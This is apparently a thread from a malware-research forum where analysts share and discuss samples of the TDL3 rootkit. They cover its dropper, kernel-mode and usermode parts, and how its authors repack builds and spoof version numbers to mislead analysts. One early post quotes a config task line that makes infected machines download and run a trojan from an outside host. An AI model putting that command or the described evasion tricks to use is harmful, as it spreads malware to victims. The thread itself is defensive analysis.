[EP_X0FF]

Thanks for the sample :D
It has wonderful payload

[tasks]
552010111050=!hxxp://sokam.info/admnew2/Dr.exe

VirusTotal
http://www.virustotal.com/analisis/7d3c ... 1273164676

BHO, dropped as

Internet Explorer Plugin Javascript Debugger RoverSoft LLC c:\windows\system32\nuxmuhj85.dll

[JohnBlaze]

hi, i don't understand what is Dr.exe? It's downloaded by 73706164644fb64d303739fe6e7570cc.exe ?

[gjf]

Dr.ex1 - Trojan-Spy.Win32.Amber.vu, downloaded by TDL3.

[EP_X0FF]

Hello,

Offtopic content deleted.

To new posters:
If you have something new about TDL3 to post - feel free to do that, but please read before first post of this thread. It has a lot of interesting information about subject of this thread.

Please understand: We do not collect out-dated information about TDL or kernel mode trojans.

Regards.

[notkov]

Hi,

@EP_XOFF
I do not understand... Are we interested in fresh samples, or only in new versions? Are you sure that they change the "version" with every new feature added ?
Someone said that they keep changing it, and leave the version number.

[gjf]

notkov, you should understand: TDL3 actually consists of dropper, kernelmode part and injected usermode dll. If the author changes dropping mechanism - well, it's interesting. Kernelmode part - very interesting. Usermode dll - OK, it's good, but not much.

"New samples" mostly are just a repacked versions of the same malware with the same dropper/kernelmode part and mostly allways - usermode part. So these samples are useless, because they are the same. Just if you will take one document and compress it using RAR, ZIP, 7-ZIP, TAR - the document will remains the same, but in different files.

[notkov]

Ok, what about my other question? I wasn't talking about re-packed samples.

"Are you sure that they change the "version" with every new feature added ?
Someone said that they keep changing it, and leave the version number."

Thank you.

[EP_X0FF]

Hello,

Are you sure that they change the "version" with every new feature added ?

No, they changed tactic to fool analysts. This is not a secret that some labs sorting samples by their version. They keep changing version id's well for a long time, so all got accustomed for this behavior. TDL team read security forums etc. Currently they are changing only tdlcmd.dll version (and it depends from drop zone mostly, for example 741 and 74 version were in same time, now 741 and 747). Without preliminary analysis it is hard to tell what kind of sample you have found, config data version is not trustworthy. Several different custom packers used to fool analysis based on size etc. Dropper code also evolving - new ways to bypass lame HIPS were added, so it now different than code posted in t4l article. So answer will be - play with samples and if something new from your opinion is discovered feel free to post them here.

Regards.

[notkov]

Thanks for your answer, EP_XOFF.
I think you should change this phrase, from first post:

4. Please do not post identical version samples!
For example if 3.273 was already posted there is no reasons to post the same version again even if it is fresh today build.

While it is possible for same version samples, to be different.

Thank you.

[fatdcuk]

Unsure if any revisions but out with Arnie and Sly...Bring on Brucey Whos is next ......place your bets!

http://www.virustotal.com/analisis/06e3 ... 1272379321

Have phun!

Muscleman to ninja makeover on the P2P bundled dropper introducing Bruce Lee

Maybe Chuck Norris coming soon :lol: